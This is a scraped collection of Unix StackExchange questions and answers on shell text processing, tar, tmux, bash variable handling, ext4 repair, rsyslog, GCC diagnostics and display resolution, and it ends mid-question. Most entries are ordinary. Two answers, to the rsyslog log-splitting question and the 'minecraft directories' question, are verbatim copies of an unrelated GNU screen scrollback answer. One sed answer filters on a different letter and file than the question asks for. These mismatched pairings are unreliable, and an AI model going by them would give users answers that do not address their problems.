I'm installing some of my data from my old server to my new server. Since I had my old server for ages, I have a huge amount of legacy data with, most certainly, legacy user and group names. When extracting, tar does its best to match the user and group info by name and uses the identifiers as a fallback or the current user as a last resort. What I'd like to do is make sure that all the users and groups exist before I do the extraction. That way all the files get the correct ids. To do that, the best way I can think of is to list all the user and group names found in the tar file. I know I can use the tar tvf backup.tar command to list all the files, but then I'd have to come up with a way to extract the right two names. I'm wondering whether there would be a simpler way than using the tv option. Some tool or command line options that only extracts the user name and group name, the I can use sort -u to reduce the list to unique entries. Anyone knows of such a feature?
Interesting question. From a quick look through the man page (searching for "user" and when that didn't turn up results, searching for "owner") the following should do it: tar xf thetarball.tgz --to-command='sh -c "echo $TAR_UNAME $TAR_GNAME"' | sort | uniq -c Obviously, change the script according to your needs. You might want $TAR_UID and $TAR_GID instead of the names for some use cases. I recommend also that you read up on the --owner-map and --group-map options for tar ; they sound like they could greatly benefit your use case and would be a lot simpler than creating all the users and groups ahead of time.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546769", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/57773/" ] }
546,820
Frequently I want to exit my ssh session without also killing the tmux session I am using. To do this I have to run the following commands: tmux detachexit or alternatively use the shortcut Ctrl+B D and then exit . Is there a way to streamline this into one command? I've tried using an alias but it seems to execute both commands inside the tmux session.
You can use tmux detach -P . Or use ~ . to exit ssh (which will detach tmux because its tty disappears).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546820", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/134585/" ] }
546,934
Got here a list of columns, as follows: 59 LOUIS 1202 +160 FREDDIE 1201 +461 FINLAY 1200 -262 LEON 1137 +1263 HARLEY 1132 +664 DAVID 1127 -165 MOHAMMAD1100 +666 REECE 1095 -167 KIAN 1090 068 KAI 1056 -669 KYLE 1030 -1870 BRANDON 1011 -471 HAYDEN 1006 +572 ZACHARY 995 +1073 KIERAN 973 -1273 LUCA 973 -175 ASHTON 954 +476 BAILEY 939 -677 JAKE 913 +1078 GABRIEL 910 +1479 SAM 900 -280 EVAN 890 081 BRADLEY 847 -13 How could be extracted only the lines with, for example, letter "L", as follows: 73 LUCA 973 -1
That seems to be duplicated, but anyway, if it was understood, one may do it as follows: First, save the list in a some nameslist.txt file, then: sed -rn '/^[^\s]+\s+[F]/p' list.txt > result.txt , which should return following output in result.txt file: 60 FREDDIE 1201 +4 61 FINLAY 1200 -2
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546934", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377374/" ] }
546,989
Got here a list, as follows: 07:41 0840228.32P379995.de472.netzwerk.com.br,S=307582,W=311813:2,04:11 1574312.116821186.der472.netzwerk.com.br,S=301166,W=307582:2,06:22 1540376.98P379995.der472.netzwerk.com.br,S=311813,W=312391:2,03:39 8712441.254782468.de472.netzwerk.com.br,S=307387,W=311615:2,07:35 9841630.971395138.de472.netzwerk.com.br,S=303039,W=303039:2,01:16 2369857.123688174.de472.netzwerk.com.br,S=298927,W=311615:2,01:08 1845871.564387663.de472.netzwerk.com.br,S=304067,W=305586:2,08:07 1236913.325890982.de472.netzwerk.com.br,S=299941,W=304067:2,05:70 1086215.397447162.de472.netzwerk.com.br,S=306747,W=309789:2,06:41 9513575.225890982.de472.netzwerk.com.br,S=305586,W=306747:2,01:70 1965849.125749892.de472.netzwerk.com.br,S=313423,W=309171:2,09:12 9564136.687415393.de472.netzwerk.com.br,S=309171,W=313423:2, Anyway could be added a ";" (semi-colon) in each space between hour and file name, so that would result as follows? 07:41;0840228.32P379995.de472.netzwerk.com.br,S=307582,W=311813:2,04:11;1574312.116821186.der472.netzwerk.com.br,S=301166,W=307582:2,06:22;1540376.98P379995.der472.netzwerk.com.br,S=311813,W=312391:2,03:39;8712441.254782468.de472.netzwerk.com.br,S=307387,W=311615:2,07:35;9841630.971395138.de472.netzwerk.com.br,S=303039,W=303039:2,01:16;2369857.123688174.de472.netzwerk.com.br,S=298927,W=311615:2,01:08;1845871.564387663.de472.netzwerk.com.br,S=304067,W=305586:2,08:07;1236913.325890982.de472.netzwerk.com.br,S=299941,W=304067:2,05:70;1086215.397447162.de472.netzwerk.com.br,S=306747,W=309789:2,06:41;9513575.225890982.de472.netzwerk.com.br,S=305586,W=306747:2,01:70;1965849.125749892.de472.netzwerk.com.br,S=313423,W=309171:2,09:12;9564136.687415393.de472.netzwerk.com.br,S=309171,W=313423:2,
Since there are no other space characters in your list, you can use sed to replace the first space character in each line with a semicolon: sed 's/ /;/' file
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546989", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377374/" ] }
547,093
I want to run a series of tests (each on a different PID), and derive a successful status only if all tests exit successfully. Something like check $PID1 && check $PID2 && check $PID3 but for an indeterminate number of tests. How can I accomplish this?
That shouldn't be too hard to write out as a loop: pids=(1025 3425 6474)check_all() { for pid in "$@"; do if ! check "$pid"; then return 1 fi done}check_all "${pids[@]}" Like the chain of commands linked with && , the function will stop on the first failing check . Though do note that I replaced your variables PID1 , PID2 etc. with a single array. Bash could iterate over variables whose names start with a particular string, but arrays are just more convenient. (Unless those variables come from the outside of the script through the environment where you can't pass proper arrays.) Also, I hard-coded the check command in the loop here. You could pass distinct commands for the function to run, but that's ripe with issues with word splitting and quote handling. (See here and here .)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547093", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/23344/" ] }
547,119
File contents: RANDOM TEXT num1=400 num2=15 RANDOM TEXTRANDOM TEXT num1=300 num2=10 RANDOM TEXTRANDOM TEXT num1=200 num2=5 RANDOM TEXT I would like to subtract 5 for each num2 per line like so: RANDOM TEXT num1=400 num2=10 RANDOM TEXTRANDOM TEXT num1=300 num2=5 RANDOM TEXTRANDOM TEXT num1=200 num2=0 RANDOM TEXT Pure bash is preferred, but no biggie if another GNU tool does it better.
Using awk : awk '{ for (i=1;i<=NF;i++) { if ($i ~ /num2=/) {sub(/num2=/, "", $i); $i="num2="$i-5; print} } }' file This will loop through each column of each line looking for the column that contains num2= . When it finds that column it will: Remove num2= - sub(/num2=/, "", $i) Redefine that column as num2={oldnum-5} - $i="num2="$i-5 Print the line - print
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547119", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/109055/" ] }
547,156
I have a few environment variables. There are multiple such values I want to convert dynamically. Env variable: I'm getting this env variable using printenv | grep proj_env_repo ( doing like printenv | grep $value ). so the value is proj_env_repo and my results are proj_env_repo_db_username=username I want to convert it to TF_ENV_db_username=username Can someone help me with it? I'm looking for a function in bash script.
Using variable name prefix matching and variable indirection in bash : proj_env_repo_db_username=usernameproj_env_repo_db_host=hostproj_env_repo_db_port=portfor variable in "${!proj_env_repo@}"; do export "TF_ENV${variable#proj_env_repo}"="${!variable}"done The loop uses "${!proj_env_repo@}" to generate a list of variable names that share the name prefix proj_env_repo . In each iteration $variable will be the name of one of these variables. Inside the loop, export is used to create a new environment variable by stripping off the proj_env_repo prefix and replacing it with the string TF_ENV . The value for the new environment variable is had using the variable indirection ${!variable} , i.e. the value of the variable whose name is stored in $variable . To additionally unset the original variable, use unset "$variable" after export , before the end of the loop. Test running this with tracing turned on: $ bash -x script.sh+ proj_env_repo_db_username=username+ proj_env_repo_db_host=host+ proj_env_repo_db_port=port+ for variable in "${!proj_env_repo@}"+ export TF_ENV_db_host=host+ TF_ENV_db_host=host+ for variable in "${!proj_env_repo@}"+ export TF_ENV_db_port=port+ TF_ENV_db_port=port+ for variable in "${!proj_env_repo@}"+ export TF_ENV_db_username=username+ TF_ENV_db_username=username As a function taking the old name prefix as its 1st argument and the new prefix as its 2nd argument: rename_var () { # Make sure arguments are valid as variable name prefixes if ! [[ $1 =~ ^[a-zA-Z_][a-zA-Z_0-9]*$ ]] || ! [[ $2 =~ ^[a-zA-Z_][a-zA-Z_0-9]*$ ]] then echo 'bad variable name prefix' >&2 return 1 fi eval 'for variable in "${!'"$1"'@}"; do export "'"$2"'${variable#'"$1"'}"="${!variable}" done'} We resort to using eval over the loop here since bash does not support the syntax ${!$1@} . The function constructs the appropriate shell code (as a string) for renaming the variables according to the values of $1 and $2 (the 1st and 2nd argument given to the function), and then uses eval to execute this shell code. You would use this function as rename_var project_env_repo TF_ENV ... or, using variables, rename_var "$old_variable_prefix" "$new_variable_prefix" Note: When doing things like these (using eval on user input), you must test that the code that you evaluate is valid and that it is what you expect it to be. In this case this mean validating $1 and $2 as valid variable name prefixes. Otherwise at least quotes and } will cause syntax errors in the eval , and there is a possibility of command injection. Note: This is the first time (I think) that I've ever had to use eval . I would never put myself in the position of having to use the above code though, but I don't know the background story to the question, obviously, so that's not real criticism of the question (which is an interesting one in itself). Related (on the Software Engineering site): Why are eval-like features considered evil, in contrast to other possibly harmful features?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547156", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/270087/" ] }
547,194
I am trying to remove some extremely large directories, however no success. Here are some observations: # cwd contains the two larger directories$ ls -lhFdrwxrwxr-x 2 hongxu hongxu 471M Oct 16 18:52 J/drwxr-xr-x 2 hongxu hongxu 5.8M Oct 16 17:21 u/# Note that this is the output of `ls` of the directory themselves so they should be *huge*# J/ seems much larger than u/ (containing more files), so take u/ as an example$ rm -rf u/# hang for a very long time, and finally reportrm: traversal failed: u: Bad message$ cd u/# can cd into u/ without problems$ ls -lhF# hang for a long time; cancel succeeds when I press Ctrl-C$ rm *# hang for a long time; cancel fails when I press Ctrl-C# however there are no process associated with `rm` as reported by `ps aux` These two directories mostly contain lots of small files (each of which not exceeding 10k, I suppose). Now that I have to remove these two directories to free more disk space. What should I do? UPDATE1: Please see the output of rm -rf u/ which tells that rm: traversal failed: u: Bad message after quite a long time (> 2 hours). Therefore, the problem seems not about efficiency. UPDATE2: When applying fsck , it reports as follows (seems fine): $ sudo fsck -A -y /dev/sda2fsck from util-linux 2.31.1fsck.fat 4.1 (2017-01-24)/dev/sda1: 13 files, 1884/130812 clusters$ df /dev/sda2Filesystem 1K-blocks Used Available Use% Mounted on/dev/sda2 244568380 189896000 43628648 82% / UPDATE3: In case it may be relevant (but probably not), these two directories ( J/ and u/ ) contain terminfo generated by tic command; different from regular compiled terminfo files (e.g., those inside /lib/terminfo ), these were generated with some fuzzing techniques so may not be "legal" terminfo files. irrelevant! UPDATE4: Some more observations: $ find u/ -type f | while read f; do echo $f; rm -f $f; done# hang for a long time, IUsed (`df -i /dev/sda2`) not decreased $ mkdir emptyfolder && rsync -r --delete emptyfolder/ u/# hang for a long time, IUsed (`df -i /dev/sda2`) not decreased $ strace rm -rf u/execve("/bin/rm", ["rm", "-rf", "u"], 0x7fffffffc550 /* 121 vars */) = 0 brk(NULL) = 0x555555764000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=125128, ...}) = 0 mmap(NULL, 125128, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fd8000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3 read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832 fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0 mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fd6000 mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff79e4000 mprotect(0x7ffff7bcb000, 2097152, PROT_NONE) = 0 mmap(0x7ffff7dcb000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ffff7dcb000 mmap(0x7ffff7dd1000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7dd1000 close(3) = 0 arch_prctl(ARCH_SET_FS, 0x7ffff7fd7540) = 0 mprotect(0x7ffff7dcb000, 16384, PROT_READ) = 0 mprotect(0x555555762000, 4096, PROT_READ) = 0 mprotect(0x7ffff7ffc000, 4096, PROT_READ) = 0 munmap(0x7ffff7fd8000, 125128) = 0 brk(NULL) = 0x555555764000 brk(0x555555785000) = 0x555555785000 openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=1683056, ...}) = 0 mmap(NULL, 1683056, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7e3b000 close(3) = 0 ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 lstat("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 newfstatat(AT_FDCWD, "u", {st_mode=S_IFDIR|0755, st_size=6045696, ...}, AT_SYMLINK_NOFOLLOW) = 0 openat(AT_FDCWD, "u", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_NOFOLLOW|O_DIRECTORY) = 3 fstat(3, {st_mode=S_IFDIR|0755, st_size=6045696, ...}) = 0 fcntl(3, F_GETFL) = 0x38800 (flags O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_NOFOLLOW|O_DIRECTORY) fcntl(3, F_SETFD, FD_CLOEXEC) = 0 getdents(3, /* 2 entries */, 32768) = 48 getdents(3, /* 1 entries */, 32768) = 24 ... (repeated lines) getdents(3, /* 1 entries */, 32768) = 24 getdents(3strace: Process 5307 detached <detached ...># (manually killed) $ ls -f1 u/./ ../../../../... (repeated lines)../ $ sudo journalctl -exOct 17 16:00:16 CSLRF03AU kernel: JBD2: Spotted dirty metadata buffer (dev = sda2, blocknr = 0). There's a risk of filesystem corruption in case of system crash.Oct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error: 6971 callbacks suppressedOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm find: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm zsh: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm rm: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm find: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm rsync: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm zsh: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm zsh: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm rm: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm find: Directory index failed checksumOct 17 16:00:20 CSLRF03AU kernel: EXT4-fs error (device sda2): ext4_htree_next_block:948: inode #9789534: block 1020: comm find: Directory index failed checksum# #9789534 is the inode of `u/` as reported by `ls -i` So should be a filesystem corruption.But rebooting does not work :(
Okay, I finally solved the issues. It was due to the filesystem errors that cause ls to display wrongly, and other utilities to malfunction. I'm sorry that the question title is misleading (despite that there are indeed many files inside u/ , the directory is not extremely large ). I solved the problem by using a live usb since the corrupted filesystem is / . The fix was simply applying sudo fsck -cfk /dev/sda2 where dev/sda2 is the corrupted disk.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547194", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/8776/" ] }
547,338
What is needed here is a command that generates six dates given a range of years (1987 to 2017). For example: 12/10/198730/04/199822/02/201417/08/201719/07/201114/05/2004 How it could be done, with sed , gawk , etc?
With date , shuf and xargs : Convert start and end date to "seconds since 1970-01-01 00:00:00 UTC" and use shuf to print six random values in this range. Pipe this result to xargs and convert the values to the desired date format. Edit: If you want dates of the year 2017 to be included in the output, you have add one year -1s ( 2017-12-31 23:59:59 ) to the end date. shuf -i generates random numbers including start and end. shuf -n6 -i$(date -d '1987-01-01' '+%s')-$(date -d '2017-01-01' '+%s')\ | xargs -I{} date -d '@{}' '+%d/%m/%Y' Example output: 07/12/198822/04/201224/09/201227/08/200019/01/200821/10/1994
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547338", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377384/" ] }
547,448
I am writing a bash script to mount DFS Windows shares via cifs . I have the main part working, but I am having trouble for when I need the user to enter the DFS path as a variable and convert the backslashes to forward slashes. #!/bin/bash FILE='\\edi3\welshch\test' FILEPATH="$("$FILE" | sed -e 's/\\/\//gp')" echo $FILEPATH I had another script that used a command to find a filepath for AD home directories then piped to sed as per the part | sed -e 's/\\/\//gp However this script above gives me; ./test.sh: line 10: \\edi3\welshch\test: command not found
Inside the command substitution you have "$FILE" | sed -e 's/\\/\//gp' , which the shell expands to (the equivalent of) '\\edi3\welshch\test' | sed -e 's/\\/\//gp' . Since it's a command , the shell goes looking for a file called \\edi3\welshch\test to run. You probably meant to use echo "$FILE" | sed ... to pass the contents of FILE to sed via the pipe. Note that even that's not right, some versions of echo will process the backslashes as escape characters, messing things up. You'll need printf "%s\n" "$FILE" | sed ... for it to work in all shells. See: Why is printf better than echo? Also, note that the default behaviour of sed is to print the line after whatever operations it does. When you use /p on the s/// command, it causes an additional print, so you get the result twice in the output. That said, since you're using Bash, you could just use the string replacement expansion: #!/bin/bashFILE='\\edi3\welshch\test'FILEPATH=${FILE//\\//}echo "$FILEPATH" gives the output //edi3/welshch/test
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547448", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/106673/" ] }
547,492
Any idea on how may be changed context-menu from default gnome-terminal to tilix in Ubuntu 18.04 Bionic Beaver? Already tried renaming /usr/bin/gnome-terminal to /usr/bin/gnome-terminalbackup , then /usr/bin/tilix to /usr/bin/gnome-terminal , but without success, context-menu keeps running `gnome-terminal.
a) Run apt install filemanager-actions-nautilus-extension b) Run FileManager-Actions Configuration Tool c) File => New Action d01) Action tab: Mark Display item in location context menu d02) Command tab: Path: /usr/bin/tilix Parameters: --working-directory=%d/%b Working directory: %d e) Restart Nautilus
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547492", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377217/" ] }
547,517
I have had a GNU screen session running for days. I find myself in the situation that I need to save the terminal contents (which I can scroll up to see) into a file. Is this possible? I estimate it to be below 5000 lines. I found a way to set up screen to log future output to a file. But in this case, I need to also save past output (or as much of it as is present).
You can use hardcopy -h command to save the contents of the current scroll bufferto a file. As described in man screen : hardcopy [-h] [file] Writes out the currently displayed image to the file file, or, if no filename is specified, to hardcopy.n in the default directory, where n is the number of the current window. This either appends or overwrites the file if it exists. See below. If the option -h is specified, dump also the contents of the scrollback buffer. You said: I estimate it to be below 5000 lines. 5000 lines is really a lot. The default length of scroll buffer in screen is just 100, not ~5000 lines. Unless you started your screen session with a larger scroll buffer setting it will not bepossible to retrieve all ~5000 lines of the scroll buffer.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547517", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/309566/" ] }
547,527
I am bringing in log files via rsyslog and my config looks like the following: root@rhel:/etc/rsyslog.d# head mail_prod_logs.confif $fromhost-ip=="10.10.10.10" and $programname=="AMP_Logs" then -/var/log/mail_logs/amp.log My logs are all stored in the /var/log/mail_logs/amp.log folder: Oct 18 13:29:28 server.com AMP_Logs: Info: Begin LogfileOct 18 14:29:28 server.com AMP_Logs: Info: Version: 12.1.0-000 SN: .....Oct 18 14:29:28 server.com AMP_Logs: Info: Time offset from UTC: -14400 secondsOct 18 15:29:23 server.com AMP_Logs: Info: Response received for.....Oct 18 15:29:23 server.com AMP_Logs: Info: File reputation query.....Oct 19 13:29:23 server.com AMP_Logs: Info: Response received for fil....Oct 19 13:29:58 server.com AMP_Logs: Info: File reputation query ....Oct 19 13:29:58 server.com AMP_Logs: Info: File reputation query .... I would like to use the datetime portion of the log to put these in hourly folders inside of daily folders inside of the month while the data is coming in by editing the mail_prod_logs.conf . So it would look like: /var/log/mail_logs/Sep/30/23.log/var/log/mail_logs/Oct/01/00.log/var/log/mail_logs/Oct/01/01.log/var/log/mail_logs/Oct/01/02.log... How can I do this?
You can use hardcopy -h command to save the contents of the current scroll bufferto a file. As described in man screen : hardcopy [-h] [file] Writes out the currently displayed image to the file file, or, if no filename is specified, to hardcopy.n in the default directory, where n is the number of the current window. This either appends or overwrites the file if it exists. See below. If the option -h is specified, dump also the contents of the scrollback buffer. You said: I estimate it to be below 5000 lines. 5000 lines is really a lot. The default length of scroll buffer in screen is just 100, not ~5000 lines. Unless you started your screen session with a larger scroll buffer setting it will not bepossible to retrieve all ~5000 lines of the scroll buffer.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547527", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/318540/" ] }
547,533
How would I list all directories containing the program name "minecraft"?
You can use hardcopy -h command to save the contents of the current scroll bufferto a file. As described in man screen : hardcopy [-h] [file] Writes out the currently displayed image to the file file, or, if no filename is specified, to hardcopy.n in the default directory, where n is the number of the current window. This either appends or overwrites the file if it exists. See below. If the option -h is specified, dump also the contents of the scrollback buffer. You said: I estimate it to be below 5000 lines. 5000 lines is really a lot. The default length of scroll buffer in screen is just 100, not ~5000 lines. Unless you started your screen session with a larger scroll buffer setting it will not bepossible to retrieve all ~5000 lines of the scroll buffer.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547533", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377941/" ] }
547,551
Need here command which removes any data at left side of ; (semicolon) on each following row: 07:48;1563101282.M178569P409830.de122.abteilung.com,S=1258,W=1287:2,08:00;1563102004.M49870P436474.de122.abteilung.com,S=1258,W=1287:2,08:16;1563102961.M195946P457876.de122.abteilung.com,S=1258,W=1287:2,08:32;1563103921.M334168P463856.de122.abteilung.com,S=1258,W=1287:2,08:48;1563104883.M883187P502037.de122.abteilung.com,S=1258,W=1287:2,09:00;1563105603.M799240P519637.de122.abteilung.com,S=1258,W=1287:2,09:16;1563106561.M419884P547969.de122.abteilung.com,S=1258,W=1287:2,09:32;1563107524.M145768P582635.de122.abteilung.com,S=1258,W=1287:2,09:48;1563108483.M632493P607265.de122.abteilung.com,S=1258,W=1287:2,10:00;1563109203.M675460P633790.de122.abteilung.com,S=1258,W=1287:2,10:16;1563110163.M299406P663234.de122.abteilung.com,S=1258,W=1287:2,10:32;1563111121.M682713P685072.de122.abteilung.com,S=1258,W=1287:2, In some way that it would results in rows as follows: 1563101282.M178569P409830.de122.abteilung.com,S=1258,W=1287:2,1563102004.M49870P436474.de122.abteilung.com,S=1258,W=1287:2,1563102961.M195946P457876.de122.abteilung.com,S=1258,W=1287:2,1563103921.M334168P463856.de122.abteilung.com,S=1258,W=1287:2,1563104883.M883187P502037.de122.abteilung.com,S=1258,W=1287:2,1563105603.M799240P519637.de122.abteilung.com,S=1258,W=1287:2,1563106561.M419884P547969.de122.abteilung.com,S=1258,W=1287:2,1563107524.M145768P582635.de122.abteilung.com,S=1258,W=1287:2,1563108483.M632493P607265.de122.abteilung.com,S=1258,W=1287:2,1563109203.M675460P633790.de122.abteilung.com,S=1258,W=1287:2,1563110163.M299406P663234.de122.abteilung.com,S=1258,W=1287:2,1563111121.M682713P685072.de122.abteilung.com,S=1258,W=1287:2, Would it be please in GNU awk , egrep or sed ?
This is what the cut command is for. cut -d';' -f2-
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547551", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377528/" ] }
547,567
When I compile a C (no pluses) program using GCC, there are several levels of messages possible, like warning, error, and note. The note messages are useless and distracting. How do I make them go away using the command line? (I don't use any sort of IDE.) Example: /home/user/src9/AllBack3.c:129:9: note: each undeclared identifier is reported only once for each function it appears in.
Pass the -fcompare-debug-second option to gcc . gcc's internal API has a diagnostic_inhibit_note() function which turns any "note:" messages off, but that is only serviceable via the unexpected -fcompare-debug-second command line switch, defined here . Fortunately, turning notes off is its only effect, unless the -fcompare-debug or the -fdump-final-insns options are also used, which afaik are only for debugging the compiler itself.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547567", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/289448/" ] }
547,650
I am a beginner in Linux when i install arch Linux dual boot , download base system then i go to chroot then make a ram using a command: mkinitcpio -p Linux . when i write it, gives me command not found. i install using this video : https://www.youtube.com/watch?v=METZCp_JCec i stop at min: 9.16.
Since 2019-10-06 it's required to install a kernel besides installing the base package. So you have to install either linux or linux-lts (or another kernel of your choice) that will pull the mkinitcpio package as a dependency. The up-to-date instructions mention that you have to do : pacstrap /mnt base linux linux-firmware So in your case basically you have to do pacstrap /mnt linux linux-firmware outside of the chroot, and then you will get the mkinitcpio tool available once you enter the chroot. The video you mention is from 2014, so don't take that modification into account. At 6:29 you can see that the package linux is being pulled when he is installing base, but it's not the case anymore (you can check in the in /mnt/var/log/pacman.log file, that no linux package has been installed).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547650", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378063/" ] }
547,653
The man page for fstab has this to say about the pass value: Pass (fsck order) Fsck order is to tell fsck what order to check the file systems, if set to "0" file system is ignored. Often a source of confusion, there are only 3 options : 0 == do not check. 1 == check this partition first. 2 == check this partition(s) next In practice, use "1" for your root partition, / and 2 for the rest. All partitions marked with a "2" are checked in sequence and you do not need to specify an order. Use "0" to disable checking the file system at boot or for network shares. It doesn't explicitly mention values higher than 2, but implies that 0 , 1 and 2 are the only useable values. Other sources (such as the fsck man page ) imply that values above 0 will be treated in ascending order ("passno value of greater than zero will be checked in order") Can values higher than 2 be used, or not?
The answer is.. it depends, but probably not. TL;DR if you use systemd , non-zero pass numbers will be checked in the order in which they appear in fstab , otherwise pass numbers will be checked sequentially in ascending order and values higher than 2 can be used. On most distributions of linux, the fsck binary is provided by util-linux . This fsck accepts pass numbers higher than 2 , and these will be treated in order. Any system which calls fsck directly will understand "pass number" values higher than 2 in fstab . It turns out that util-linux 's fsck is not always used to check fstab . systemd maintains its own internal copy of fsck called systemd-fsck , which treats any non-zero fstab entries in the order in which they appear (specifically, it will not scan your pass number 1 entries before others). On linux distributions that use systemd , systemd-fsck is used for automated file system checks, and in those cases the pass number is treated as a boolean ( 0 is means "false", or "don't verify" and != 0 is true, or "verify"). Also, don't forget that the root drive (the / mount) is sometimes checked separately. Many thanks to Ned64 , who did much research in their answer .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547653", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/72873/" ] }
547,812
I just got a new display (Samsung LC27JG50QQU, 1440p, 144hz) which is plugged into my AMD Radeon HD 6950 (DVI-D, DVI-I, HDMI 1.4, 2x Mini DisplayPort) graphics card using HDMI. However, it only lets me set 1080p max in my display settings. Cable and monitor were fine on 1440p with my MacBook Pro. I am running Linux Mint 19.1 Tessa This is the output xrandr gives: Screen 0: minimum 320 x 200, current 1920 x 1080, maximum 16384 x 16384DisplayPort-3 disconnected (normal left inverted right x axis y axis)DisplayPort-4 disconnected (normal left inverted right x axis y axis)HDMI-3 connected primary 1920x1080+0+0 (normal left inverted right x axis y axis) 597mm x 336mm 1920x1080 60.00* 50.00 59.94 1680x1050 59.88 1600x900 60.00 1280x1024 75.02 60.02 1440x900 59.90 1280x800 59.91 1152x864 75.00 1280x720 60.00 50.00 59.94 1024x768 75.03 70.07 60.00 832x624 74.55 800x600 72.19 75.00 60.32 56.25 720x576 50.00 720x480 60.00 59.94 640x480 75.00 72.81 66.67 60.00 59.94 720x400 70.08 DVI-0 disconnected (normal left inverted right x axis y axis)DVI-1 disconnected (normal left inverted right x axis y axis)VGA-1-1 disconnected (normal left inverted right x axis y axis)HDMI-1-1 disconnected (normal left inverted right x axis y axis)DP-1-1 disconnected (normal left inverted right x axis y axis)HDMI-1-2 disconnected (normal left inverted right x axis y axis)HDMI-1-3 disconnected (normal left inverted right x axis y axis)DP-1-2 disconnected (normal left inverted right x axis y axis)DP-1-3 disconnected (normal left inverted right x axis y axis) lspci -k | grep -EA3 'VGA|3D|Display' : 00:02.0 Display controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09) Subsystem: Gigabyte Technology Co., Ltd 2nd Generation Core Processor Family Integrated Graphics Controller Kernel driver in use: i915 Kernel modules: i915--01:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Cayman PRO [Radeon HD 6950] Subsystem: Hightech Information System Ltd. Cayman PRO [Radeon HD 6950] Kernel driver in use: radeon Kernel modules: radeon glxinfo | grep -i vendor : server glx vendor string: SGIclient glx vendor string: Mesa Project and SGI Vendor: X.Org (0x1002)OpenGL vendor string: X.Org EDID: 